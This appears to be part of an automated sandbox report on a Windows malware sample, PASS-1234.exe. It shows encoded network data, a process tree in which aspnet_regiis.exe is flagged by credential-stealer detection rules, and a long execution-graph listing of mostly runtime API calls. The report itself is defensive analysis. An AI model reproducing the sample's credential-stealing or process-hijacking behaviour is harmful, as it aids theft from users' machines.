4a 52 6d
                                                                                        Data Ascii: qmdntrxQWmm5hfAPQ7uOWijDGsPA5cLaJYdXPjh3O0wOVTCxKBNKiytFQczxuUxYLkQoBCbWpl4E4uRIfkcKb1/gB8DsBVnvDUfxnVLZvfquFmuS08c3bgTmlOpPt/vvzMUi8WghuJs4R8DsAzheep/zSuXBxxc7ZIVFe7ii6z/t4AGRHcXrS7vE1g0zSD/9WVYr8WCXBlsnRtLKP1Iqz13kMraokes7mFWxHNEbnguJ93hw4nLHCeelZoroJRm
                                                                                        2024-12-31 16:40:21 UTC1369INData Raw: 76 49 73 49 74 6d 6f 6a 63 66 32 2f 30 4f 5a 54 65 33 4a 67 30 6d 6a 41 73 58 56 79 78 64 57 35 4c 67 4f 5a 79 68 2b 65 39 51 44 51 34 67 30 65 79 69 62 52 64 59 75 77 39 6e 64 36 66 6e 48 53 55 50 41 63 6f 50 34 42 75 66 46 61 38 32 30 32 59 38 64 78 56 42 6a 6a 62 48 49 43 51 6f 33 63 6b 7a 44 75 68 34 34 71 6b 62 4b 41 6a 62 48 51 2f 6e 33 34 6f 66 35 36 44 62 34 33 67 33 58 6f 75 4d 38 51 6b 6a 5a 57 2b 44 68 54 32 59 5a 7a 65 76 36 4d 77 77 68 35 74 62 56 75 37 50 48 6f 73 76 75 52 4f 75 65 50 61 61 53 38 65 36 42 57 77 74 49 64 55 4d 76 63 61 6e 64 69 75 6b 45 4b 31 46 52 6c 5a 55 6f 38 36 63 32 32 64 33 31 4c 6f 37 4c 73 43 66 6d 6a 6e 47 4f 6d 33 69 45 68 6c 31 54 53 69 34 49 75 4d 55 49 77 37 4e 6d 42 67 6e 46 31 43 4b 49 44 37 62 34 4f 70 34 30
                                                                                        Data Ascii: vIsItmojcf2/0OZTe3Jg0mjAsXVyxdW5LgOZyh+e9QDQ4g0eyibRdYuw9nd6fnHSUPAcoP4BufFa8202Y8dxVBjjbHICQo3ckzDuh44qkbKAjbHQ/n34of56Db43g3XouM8QkjZW+DhT2YZzev6Mwwh5tbVu7PHosvuROuePaaS8e6BWwtIdUMvcandiukEK1FRlZUo86c22d31Lo7LsCfmjnGOm3iEhl1TSi4IuMUIw7NmBgnF1CKID7b4Op40


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:39:12
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\PASS-1234.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\PASS-1234.exe"
                                                                                        Imagebase:0xb90000
                                                                                        File size:761'856 bytes
                                                                                        MD5 hash:CF15F3E3576D512CF0696D4035212451
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:11:39:12
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:3
                                                                                        Start time:11:39:13
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                        Imagebase:0x840000
                                                                                        File size:43'016 bytes
                                                                                        MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Target ID:6
                                                                                        Start time:11:39:13
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1224
                                                                                        Imagebase:0xe20000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:9.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:14.2%
                                                                                          Total number of Nodes:684
                                                                                          Total number of Limit Nodes:23
                                                                                          execution_graph 12154 6d38fcde 12155 6d38fce9 12154->12155 12156 6d38fd1c 12154->12156 12158 6d38fd0e 12155->12158 12159 6d38fcee 12155->12159 12193 6d38fe38 12156->12193 12166 6d38fd31 12158->12166 12160 6d38fcf3 12159->12160 12161 6d38fd04 12159->12161 12164 6d38fcf8 12160->12164 12180 6d39030a 12160->12180 12185 6d3902eb 12161->12185 12167 6d38fd3d ___scrt_is_nonwritable_in_current_image 12166->12167 12220 6d39037b 12167->12220 12169 6d38fd44 __DllMainCRTStartup@12 12170 6d38fd6b 12169->12170 12171 6d38fe30 12169->12171 12177 6d38fda7 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 12169->12177 12231 6d3902dd 12170->12231 12239 6d39051a IsProcessorFeaturePresent 12171->12239 12174 6d38fe37 12175 6d38fd7a __RTC_Initialize 12175->12177 12234 6d3901fb InitializeSListHead 12175->12234 12177->12164 12178 6d38fd88 12178->12177 12235 6d3902b2 12178->12235 12333 6d39256e 12180->12333 12637 6d3911c0 12185->12637 12188 6d3902f4 12188->12164 12191 6d390307 12191->12164 12192 6d3911cb 21 API calls 12192->12188 12194 6d38fe44 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 12193->12194 12195 6d38fee0 12194->12195 12196 6d38fe75 12194->12196 12211 6d38fe4d 12194->12211 12197 6d39051a __DllMainCRTStartup@12 4 API calls 12195->12197 12657 6d39034b 12196->12657 12201 6d38fee7 ___scrt_is_nonwritable_in_current_image 12197->12201 12199 6d38fe7a 12666 6d390207 12199->12666 12202 6d38ff1d dllmain_raw 12201->12202 12204 6d38ff18 12201->12204 12217 6d38ff03 12201->12217 12205 6d38ff37 dllmain_crt_dispatch 12202->12205 12202->12217 12203 6d38fe7f __RTC_Initialize __DllMainCRTStartup@12 12669 6d3904ec 12203->12669 12678 6d38eb40 12204->12678 12205->12204 12205->12217 12211->12164 12212 6d38ff89 12213 6d38ff92 dllmain_crt_dispatch 12212->12213 12212->12217 12215 6d38ffa5 dllmain_raw 12213->12215 12213->12217 12214 6d38eb40 __DllMainCRTStartup@12 5 API calls 12216 6d38ff70 12214->12216 12215->12217 12218 6d38fe38 __DllMainCRTStartup@12 79 API calls 12216->12218 12217->12164 12219 6d38ff7e dllmain_raw 12218->12219 12219->12212 12221 6d390384 12220->12221 12243 6d3906e8 IsProcessorFeaturePresent 12221->12243 12225 6d390395 12230 6d390399 12225->12230 12253 6d392551 12225->12253 12227 6d3903b0 12227->12169 12230->12169 12327 6d3903b4 12231->12327 12233 6d3902e4 12233->12175 12234->12178 12236 6d3902b7 ___scrt_release_startup_lock 12235->12236 12237 6d3902c0 12236->12237 12238 6d3906e8 IsProcessorFeaturePresent 12236->12238 12237->12177 12238->12237 12240 6d390530 __DllMainCRTStartup@12 12239->12240 12241 6d3905db IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12240->12241 12242 6d390626 __DllMainCRTStartup@12 12241->12242 12242->12174 12244 6d390390 12243->12244 12245 6d3911a1 12244->12245 12262 6d3915d7 12245->12262 12248 6d3911aa 12248->12225 12250 6d3911b2 12251 6d3911bd 12250->12251 12276 6d391613 12250->12276 12251->12225 12318 6d394c9d 12253->12318 12256 6d3911d6 12257 6d3911e9 12256->12257 12258 6d3911df 12256->12258 12257->12230 12259 6d3915bc ___vcrt_uninitialize_ptd 6 API calls 12258->12259 12260 6d3911e4 12259->12260 12261 6d391613 ___vcrt_uninitialize_locks DeleteCriticalSection 12260->12261 12261->12257 12263 6d3915e0 12262->12263 12265 6d391609 12263->12265 12267 6d3911a6 12263->12267 12280 6d391845 12263->12280 12266 6d391613 ___vcrt_uninitialize_locks DeleteCriticalSection 12265->12266 12266->12267 12267->12248 12268 6d391589 12267->12268 12299 6d391756 12268->12299 12271 6d39159e 12271->12250 12274 6d3915b9 12274->12250 12277 6d39163d 12276->12277 12278 6d39161e 12276->12278 12277->12248 12279 6d391628 DeleteCriticalSection 12278->12279 12279->12277 12279->12279 12285 6d39170d 12280->12285 12283 6d391868 12283->12263 12284 6d39187d InitializeCriticalSectionAndSpinCount 12284->12283 12286 6d391748 12285->12286 12287 6d391725 12285->12287 12286->12283 12286->12284 12287->12286 12291 6d391673 12287->12291 12290 6d39173a GetProcAddress 12290->12286 12297 6d39167f ___vcrt_FlsGetValue 12291->12297 12292 6d3916f3 12292->12286 12292->12290 12293 6d391695 LoadLibraryExW 12294 6d3916fa 12293->12294 12295 6d3916b3 GetLastError 12293->12295 12294->12292 12296 6d391702 FreeLibrary 12294->12296 12295->12297 12296->12292 12297->12292 12297->12293 12298 6d3916d5 LoadLibraryExW 12297->12298 12298->12294 12298->12297 12300 6d39170d ___vcrt_FlsGetValue 5 API calls 12299->12300 12301 6d391770 12300->12301 12302 6d391789 TlsAlloc 12301->12302 12303 6d391593 12301->12303 12303->12271 12304 6d391807 12303->12304 12305 6d39170d ___vcrt_FlsGetValue 5 API calls 12304->12305 12306 6d391821 12305->12306 12307 6d39183c TlsSetValue 12306->12307 12308 6d3915ac 12306->12308 12307->12308 12308->12274 12309 6d3915bc 12308->12309 12310 6d3915c6 12309->12310 12312 6d3915cc 12309->12312 12313 6d391791 12310->12313 12312->12271 12314 6d39170d ___vcrt_FlsGetValue 5 API calls 12313->12314 12315 6d3917ab 12314->12315 12316 6d3917c3 TlsFree 12315->12316 12317 6d3917b7 12315->12317 12316->12317 12317->12312 12319 6d394cad 12318->12319 12320 6d3903a2 12318->12320 12319->12320 12322 6d394b5d 12319->12322 12320->12227 12320->12256 12323 6d394b64 12322->12323 12324 6d394ba7 GetStdHandle 12323->12324 12325 6d394c0d 12323->12325 12326 6d394bba GetFileType 12323->12326 12324->12323 12325->12319 12326->12323 12328 6d3903c0 12327->12328 12329 6d3903c4 12327->12329 12328->12233 12330 6d39051a __DllMainCRTStartup@12 4 API calls 12329->12330 12332 6d3903d1 ___scrt_release_startup_lock 12329->12332 12331 6d39043a 12330->12331 12332->12233 12339 6d392b5b 12333->12339 12336 6d3911cb 12617 6d3914b3 12336->12617 12340 6d392b65 12339->12340 12343 6d39030f 12339->12343 12347 6d3948d1 12340->12347 12343->12336 12363 6d394771 12347->12363 12349 6d3948ed 12350 6d394908 TlsGetValue 12349->12350 12351 6d392b6c 12349->12351 12351->12343 12352 6d394910 12351->12352 12353 6d394771 _free 5 API calls 12352->12353 12354 6d39492c 12353->12354 12355 6d39494a TlsSetValue 12354->12355 12356 6d392b7f 12354->12356 12357 6d392a22 12356->12357 12358 6d392a2d 12357->12358 12359 6d392a3d 12357->12359 12376 6d392a43 12358->12376 12359->12343 12364 6d39479f 12363->12364 12368 6d39479b _free 12363->12368 12364->12368 12369 6d3946aa 12364->12369 12367 6d3947b9 GetProcAddress 12367->12368 12368->12349 12374 6d3946bb ___vcrt_FlsGetValue 12369->12374 12370 6d3946d9 LoadLibraryExW 12371 6d3946f4 GetLastError 12370->12371 12370->12374 12371->12374 12372 6d39474f FreeLibrary 12372->12374 12373 6d394766 12373->12367 12373->12368 12374->12370 12374->12372 12374->12373 12375 6d394727 LoadLibraryExW 12374->12375 12375->12374 12377 6d392a58 12376->12377 12378 6d392a5e 12376->12378 12379 6d393183 _free 14 API calls 12377->12379 12380 6d393183 _free 14 API calls 12378->12380 12379->12378 12381 6d392a6a 12380->12381 12382 6d393183 _free 14 API calls 12381->12382 12383 6d392a75 12382->12383 12384 6d393183 _free 14 API calls 12383->12384 12385 6d392a80 12384->12385 12386 6d393183 _free 14 API calls 12385->12386 12387 6d392a8b 12386->12387 12388 6d393183 _free 14 API calls 12387->12388 12389 6d392a96 12388->12389 12390 6d393183 _free 14 API calls 12389->12390 12391 6d392aa1 12390->12391 12392 6d393183 _free 14 API calls 12391->12392 12393 6d392aac 12392->12393 12394 6d393183 _free 14 API calls 12393->12394 12395 6d392ab7 12394->12395 12396 6d393183 _free 14 API calls 12395->12396 12397 6d392ac5 12396->12397 12408 6d39286f 12397->12408 12402 6d393183 12403 6d39318e HeapFree 12402->12403 12407 6d3931b7 _free 12402->12407 12404 6d3931a3 12403->12404 12403->12407 12548 6d393113 12404->12548 12407->12359 12409 6d39287b ___scrt_is_nonwritable_in_current_image 12408->12409 12424 6d392e1a EnterCriticalSection 12409->12424 12411 6d3928af 12425 6d3928ce 12411->12425 12413 6d392885 12413->12411 12415 6d393183 _free 14 API calls 12413->12415 12415->12411 12416 6d3928da 12417 6d3928e6 ___scrt_is_nonwritable_in_current_image 12416->12417 12429 6d392e1a EnterCriticalSection 12417->12429 12419 6d3928f0 12430 6d392b10 12419->12430 12421 6d392903 12434 6d392923 12421->12434 12424->12413 12428 6d392e62 LeaveCriticalSection 12425->12428 12427 6d3928bc 12427->12416 12428->12427 12429->12419 12431 6d392b46 __fassign 12430->12431 12432 6d392b1f __fassign 12430->12432 12431->12421 12432->12431 12437 6d395868 12432->12437 12547 6d392e62 LeaveCriticalSection 12434->12547 12436 6d392911 12436->12402 12439 6d3958e8 12437->12439 12440 6d39587e 12437->12440 12442 6d393183 _free 14 API calls 12439->12442 12463 6d395936 12439->12463 12440->12439 12446 6d393183 _free 14 API calls 12440->12446 12447 6d3958b1 12440->12447 12441 6d395944 12450 6d3959a4 12441->12450 12464 6d393183 14 API calls _free 12441->12464 12443 6d39590a 12442->12443 12444 6d393183 _free 14 API calls 12443->12444 12448 6d39591d 12444->12448 12445 6d393183 _free 14 API calls 12449 6d3958dd 12445->12449 12451 6d3958a6 12446->12451 12452 6d393183 _free 14 API calls 12447->12452 12462 6d3958d3 12447->12462 12453 6d393183 _free 14 API calls 12448->12453 12454 6d393183 _free 14 API calls 12449->12454 12455 6d393183 _free 14 API calls 12450->12455 12465 6d397797 12451->12465 12457 6d3958c8 12452->12457 12458 6d39592b 12453->12458 12454->12439 12459 6d3959aa 12455->12459 12493 6d397895 12457->12493 12461 6d393183 _free 14 API calls 12458->12461 12459->12431 12461->12463 12462->12445 12505 6d3959d9 12463->12505 12464->12441 12466 6d3977a8 12465->12466 12492 6d397891 12465->12492 12467 6d3977b9 12466->12467 12468 6d393183 _free 14 API calls 12466->12468 12469 6d3977cb 12467->12469 12471 6d393183 _free 14 API calls 12467->12471 12468->12467 12470 6d3977dd 12469->12470 12472 6d393183 _free 14 API calls 12469->12472 12473 6d393183 _free 14 API calls 12470->12473 12475 6d3977ef 12470->12475 12471->12469 12472->12470 12473->12475 12474 6d397801 12477 6d397813 12474->12477 12479 6d393183 _free 14 API calls 12474->12479 12475->12474 12476 6d393183 _free 14 API calls 12475->12476 12476->12474 12478 6d397825 12477->12478 12480 6d393183 _free 14 API calls 12477->12480 12481 6d397837 12478->12481 12482 6d393183 _free 14 API calls 12478->12482 12479->12477 12480->12478 12483 6d397849 12481->12483 12484 6d393183 _free 14 API calls 12481->12484 12482->12481 12485 6d39785b 12483->12485 12487 6d393183 _free 14 API calls 12483->12487 12484->12483 12486 6d39786d 12485->12486 12488 6d393183 _free 14 API calls 12485->12488 12489 6d39787f 12486->12489 12490 6d393183 _free 14 API calls 12486->12490 12487->12485 12488->12486 12491 6d393183 _free 14 API calls 12489->12491 12489->12492 12490->12489 12491->12492 12492->12447 12494 6d3978a2 12493->12494 12504 6d3978fa 12493->12504 12495 6d3978b2 12494->12495 12496 6d393183 _free 14 API calls 12494->12496 12497 6d3978c4 12495->12497 12498 6d393183 _free 14 API calls 12495->12498 12496->12495 12499 6d3978d6 12497->12499 12500 6d393183 _free 14 API calls 12497->12500 12498->12497 12501 6d3978e8 12499->12501 12502 6d393183 _free 14 API calls 12499->12502 12500->12499 12503 6d393183 _free 14 API calls 12501->12503 12501->12504 12502->12501 12503->12504 12504->12462 12506 6d395a05 12505->12506 12507 6d3959e6 12505->12507 12506->12441 12507->12506 12511 6d397936 12507->12511 12510 6d393183 _free 14 API calls 12510->12506 12512 6d3959ff 12511->12512 12513 6d397947 12511->12513 12512->12510 12514 6d3978fe __fassign 14 API calls 12513->12514 12515 6d39794f 12514->12515 12516 6d3978fe __fassign 14 API calls 12515->12516 12517 6d39795a 12516->12517 12518 6d3978fe __fassign 14 API calls 12517->12518 12519 6d397965 12518->12519 12520 6d3978fe __fassign 14 API calls 12519->12520 12521 6d397970 12520->12521 12522 6d3978fe __fassign 14 API calls 12521->12522 12523 6d39797e 12522->12523 12524 6d393183 _free 14 API calls 12523->12524 12525 6d397989 12524->12525 12526 6d393183 _free 14 API calls 12525->12526 12527 6d397994 12526->12527 12528 6d393183 _free 14 API calls 12527->12528 12529 6d39799f 12528->12529 12530 6d3978fe __fassign 14 API calls 12529->12530 12531 6d3979ad 12530->12531 12532 6d3978fe __fassign 14 API calls 12531->12532 12533 6d3979bb 12532->12533 12534 6d3978fe __fassign 14 API calls 12533->12534 12535 6d3979cc 12534->12535 12536 6d3978fe __fassign 14 API calls 12535->12536 12537 6d3979da 12536->12537 12538 6d3978fe __fassign 14 API calls 12537->12538 12539 6d3979e8 12538->12539 12540 6d393183 _free 14 API calls 12539->12540 12541 6d3979f3 12540->12541 12542 6d393183 _free 14 API calls 12541->12542 12543 6d3979fe 12542->12543 12544 6d393183 _free 14 API calls 12543->12544 12545 6d397a09 12544->12545 12546 6d393183 _free 14 API calls 12545->12546 12546->12512 12547->12436 12551 6d392cde GetLastError 12548->12551 12550 6d393118 GetLastError 12550->12407 12552 6d392cfb 12551->12552 12553 6d392cf5 12551->12553 12555 6d394910 _free 6 API calls 12552->12555 12571 6d392d01 SetLastError 12552->12571 12554 6d3948d1 _free 6 API calls 12553->12554 12554->12552 12556 6d392d19 12555->12556 12556->12571 12574 6d393126 12556->12574 12560 6d392d48 12563 6d394910 _free 6 API calls 12560->12563 12561 6d392d31 12562 6d394910 _free 6 API calls 12561->12562 12572 6d392d3f 12562->12572 12564 6d392d54 12563->12564 12565 6d392d69 12564->12565 12566 6d392d58 12564->12566 12581 6d392989 12565->12581 12568 6d394910 _free 6 API calls 12566->12568 12567 6d393183 _free 12 API calls 12567->12571 12568->12572 12571->12550 12572->12567 12573 6d393183 _free 12 API calls 12573->12571 12580 6d393133 _free 12574->12580 12575 6d393173 12578 6d393113 _free 13 API calls 12575->12578 12576 6d39315e RtlAllocateHeap 12577 6d392d29 12576->12577 12576->12580 12577->12560 12577->12561 12578->12577 12580->12575 12580->12576 12586 6d394d45 12580->12586 12595 6d39281d 12581->12595 12589 6d394d72 12586->12589 12590 6d394d7e ___scrt_is_nonwritable_in_current_image 12589->12590 12591 6d392e1a __fassign EnterCriticalSection 12590->12591 12592 6d394d89 12591->12592 12593 6d394dc5 _free LeaveCriticalSection 12592->12593 12594 6d394d50 12593->12594 12594->12580 12596 6d392829 ___scrt_is_nonwritable_in_current_image 12595->12596 12609 6d392e1a EnterCriticalSection 12596->12609 12598 6d392833 12610 6d392863 12598->12610 12601 6d39292f 12602 6d39293b ___scrt_is_nonwritable_in_current_image 12601->12602 12613 6d392e1a EnterCriticalSection 12602->12613 12604 6d392945 12605 6d392b10 _free 14 API calls 12604->12605 12606 6d39295d 12605->12606 12614 6d39297d 12606->12614 12609->12598 12611 6d392e62 __fassign LeaveCriticalSection 12610->12611 12612 6d392851 12611->12612 12612->12601 12613->12604 12615 6d392e62 __fassign LeaveCriticalSection 12614->12615 12616 6d39296b 12615->12616 12616->12573 12618 6d3914c0 12617->12618 12619 6d390314 12617->12619 12620 6d3914ce 12618->12620 12625 6d3917cc 12618->12625 12619->12164 12621 6d391807 ___vcrt_FlsSetValue 6 API calls 12620->12621 12623 6d3914de 12621->12623 12630 6d391497 12623->12630 12626 6d39170d ___vcrt_FlsGetValue 5 API calls 12625->12626 12627 6d3917e6 12626->12627 12628 6d3917fe TlsGetValue 12627->12628 12629 6d3917f2 12627->12629 12628->12629 12629->12620 12631 6d3914ae 12630->12631 12632 6d3914a1 12630->12632 12631->12619 12632->12631 12634 6d3925f4 12632->12634 12635 6d393183 _free 14 API calls 12634->12635 12636 6d39260c 12635->12636 12636->12631 12643 6d3914f7 12637->12643 12639 6d3902f0 12639->12188 12640 6d392563 12639->12640 12641 6d392cde _free 14 API calls 12640->12641 12642 6d3902fc 12641->12642 12642->12191 12642->12192 12644 6d391500 12643->12644 12645 6d391503 GetLastError 12643->12645 12644->12639 12646 6d3917cc ___vcrt_FlsGetValue 6 API calls 12645->12646 12647 6d391518 12646->12647 12648 6d391537 12647->12648 12649 6d39157d SetLastError 12647->12649 12650 6d391807 ___vcrt_FlsSetValue 6 API calls 12647->12650 12648->12649 12649->12639 12651 6d391531 12650->12651 12651->12648 12652 6d391559 12651->12652 12653 6d391807 ___vcrt_FlsSetValue 6 API calls 12651->12653 12654 6d391807 ___vcrt_FlsSetValue 6 API calls 12652->12654 12655 6d39156d 12652->12655 12653->12652 12654->12655 12656 6d3925f4 ___vcrt_freefls@4 14 API calls 12655->12656 12656->12648 12658 6d390350 ___scrt_release_startup_lock 12657->12658 12659 6d390354 12658->12659 12661 6d390360 __DllMainCRTStartup@12 12658->12661 12682 6d3923de 12659->12682 12663 6d39036d 12661->12663 12685 6d391c41 12661->12685 12663->12199 12752 6d39117e InterlockedFlushSList 12666->12752 12670 6d3904f8 12669->12670 12671 6d38fe9e 12670->12671 12756 6d392576 12670->12756 12675 6d38feda 12671->12675 12673 6d390506 12674 6d3911d6 ___scrt_uninitialize_crt 7 API calls 12673->12674 12674->12671 12869 6d39036e 12675->12869 12679 6d38eb9c 12678->12679 12886 6d38fcd0 12679->12886 12681 6d38fa0d 12681->12212 12681->12214 12696 6d3922a9 12682->12696 12686 6d391c4f 12685->12686 12687 6d391c60 12685->12687 12713 6d391ce7 GetModuleHandleW 12686->12713 12720 6d391b07 12687->12720 12692 6d391c9a 12692->12199 12697 6d3922b5 ___scrt_is_nonwritable_in_current_image 12696->12697 12704 6d392e1a EnterCriticalSection 12697->12704 12699 6d3922c3 12705 6d392304 12699->12705 12704->12699 12706 6d3922d0 12705->12706 12708 6d392323 12705->12708 12709 6d3922f8 12706->12709 12707 6d393183 _free 14 API calls 12707->12706 12708->12706 12708->12707 12712 6d392e62 LeaveCriticalSection 12709->12712 12711 6d39035e 12711->12199 12712->12711 12714 6d391c54 12713->12714 12714->12687 12715 6d391d2a GetModuleHandleExW 12714->12715 12716 6d391d49 GetProcAddress 12715->12716 12719 6d391d5e 12715->12719 12716->12719 12717 6d391d7b 12717->12687 12718 6d391d72 FreeLibrary 12718->12717 12719->12717 12719->12718 12721 6d391b13 ___scrt_is_nonwritable_in_current_image 12720->12721 12736 6d392e1a EnterCriticalSection 12721->12736 12723 6d391b1d 12737 6d391b54 12723->12737 12725 6d391b2a 12741 6d391b48 12725->12741 12728 6d391ca5 12745 6d392e79 GetPEB 12728->12745 12731 6d391cd4 12734 6d391d2a __DllMainCRTStartup@12 3 API calls 12731->12734 12732 6d391cb4 GetPEB 12732->12731 12733 6d391cc4 GetCurrentProcess TerminateProcess 12732->12733 12733->12731 12735 6d391cdc ExitProcess 12734->12735 12736->12723 12739 6d391b60 ___scrt_is_nonwritable_in_current_image 12737->12739 12738 6d391bc1 __DllMainCRTStartup@12 12738->12725 12739->12738 12740 6d3923de __DllMainCRTStartup@12 14 API calls 12739->12740 12740->12738 12744 6d392e62 LeaveCriticalSection 12741->12744 12743 6d391b36 12743->12692 12743->12728 12744->12743 12746 6d392e93 12745->12746 12747 6d391caf 12745->12747 12749 6d3947f4 12746->12749 12747->12731 12747->12732 12750 6d394771 _free 5 API calls 12749->12750 12751 6d394810 12750->12751 12751->12747 12754 6d39118e 12752->12754 12755 6d390211 12752->12755 12753 6d3925f4 ___vcrt_freefls@4 14 API calls 12753->12754 12754->12753 12754->12755 12755->12203 12757 6d392581 12756->12757 12758 6d392593 ___scrt_uninitialize_crt 12756->12758 12759 6d39258f 12757->12759 12761 6d3953b7 12757->12761 12758->12673 12759->12673 12764 6d395265 12761->12764 12767 6d3951b9 12764->12767 12768 6d3951c5 ___scrt_is_nonwritable_in_current_image 12767->12768 12775 6d392e1a EnterCriticalSection 12768->12775 12770 6d39523b 12784 6d395259 12770->12784 12772 6d3951cf ___scrt_uninitialize_crt 12772->12770 12776 6d39512d 12772->12776 12775->12772 12777 6d395139 ___scrt_is_nonwritable_in_current_image 12776->12777 12787 6d3954d4 EnterCriticalSection 12777->12787 12779 6d395143 ___scrt_uninitialize_crt 12780 6d39517c 12779->12780 12788 6d39536f 12779->12788 12798 6d3951ad 12780->12798 12868 6d392e62 LeaveCriticalSection 12784->12868 12786 6d395247 12786->12759 12787->12779 12789 6d39537c 12788->12789 12790 6d395385 12788->12790 12791 6d395265 ___scrt_uninitialize_crt 66 API calls 12789->12791 12801 6d39530a 12790->12801 12797 6d395382 12791->12797 12795 6d3953a1 12814 6d3969d2 12795->12814 12797->12780 12867 6d3954e8 LeaveCriticalSection 12798->12867 12800 6d39519b 12800->12772 12802 6d395322 12801->12802 12806 6d395347 12801->12806 12803 6d395700 ___scrt_uninitialize_crt 25 API calls 12802->12803 12802->12806 12804 6d395340 12803->12804 12825 6d3971ca 12804->12825 12806->12797 12807 6d395700 12806->12807 12808 6d39570c 12807->12808 12809 6d395721 12807->12809 12810 6d393113 _free 14 API calls 12808->12810 12809->12795 12811 6d395711 12810->12811 12850 6d393056 12811->12850 12815 6d3969f0 12814->12815 12816 6d3969e3 12814->12816 12818 6d396a39 12815->12818 12820 6d396a17 12815->12820 12817 6d393113 _free 14 API calls 12816->12817 12824 6d3969e8 12817->12824 12819 6d393113 _free 14 API calls 12818->12819 12821 6d396a3e 12819->12821 12853 6d396930 12820->12853 12823 6d393056 __fassign 25 API calls 12821->12823 12823->12824 12824->12797 12826 6d3971d6 ___scrt_is_nonwritable_in_current_image 12825->12826 12827 6d3971de 12826->12827 12828 6d3971f6 12826->12828 12830 6d393100 __dosmaperr 14 API calls 12827->12830 12829 6d397291 12828->12829 12833 6d397228 12828->12833 12831 6d393100 __dosmaperr 14 API calls 12829->12831 12832 6d3971e3 12830->12832 12834 6d397296 12831->12834 12835 6d393113 _free 14 API calls 12832->12835 12836 6d3967ef ___scrt_uninitialize_crt EnterCriticalSection 12833->12836 12837 6d393113 _free 14 API calls 12834->12837 12849 6d3971eb 12835->12849 12838 6d39722e 12836->12838 12839 6d39729e 12837->12839 12840 6d39724a 12838->12840 12841 6d39725f 12838->12841 12842 6d393056 __fassign 25 API calls 12839->12842 12843 6d393113 _free 14 API calls 12840->12843 12844 6d3972bc ___scrt_uninitialize_crt 60 API calls 12841->12844 12842->12849 12845 6d39724f 12843->12845 12846 6d39725a 12844->12846 12847 6d393100 __dosmaperr 14 API calls 12845->12847 12848 6d397289 ___scrt_uninitialize_crt LeaveCriticalSection 12846->12848 12847->12846 12848->12849 12849->12806 12851 6d392ff2 __fassign 25 API calls 12850->12851 12852 6d393062 12851->12852 12852->12795 12854 6d39693c ___scrt_is_nonwritable_in_current_image 12853->12854 12855 6d3967ef ___scrt_uninitialize_crt EnterCriticalSection 12854->12855 12856 6d39694b 12855->12856 12857 6d396992 12856->12857 12859 6d3968c6 ___scrt_uninitialize_crt 25 API calls 12856->12859 12858 6d393113 _free 14 API calls 12857->12858 12861 6d396997 12858->12861 12860 6d396977 FlushFileBuffers 12859->12860 12860->12861 12862 6d396983 12860->12862 12864 6d3969c6 ___scrt_uninitialize_crt LeaveCriticalSection 12861->12864 12863 6d393100 __dosmaperr 14 API calls 12862->12863 12865 6d396988 GetLastError 12863->12865 12866 6d3969af 12864->12866 12865->12857 12866->12824 12867->12800 12868->12786 12874 6d3925a6 12869->12874 12872 6d3915bc ___vcrt_uninitialize_ptd 6 API calls 12873 6d38fedf 12872->12873 12873->12211 12877 6d392dbf 12874->12877 12878 6d392dc9 12877->12878 12879 6d390375 12877->12879 12881 6d394892 12878->12881 12879->12872 12882 6d394771 _free 5 API calls 12881->12882 12883 6d3948ae 12882->12883 12884 6d3948c9 TlsFree 12883->12884 12885 6d3948b7 12883->12885 12885->12879 12887 6d38fcd8 12886->12887 12888 6d38fcd9 IsProcessorFeaturePresent 12886->12888 12887->12681 12890 6d39007e 12888->12890 12893 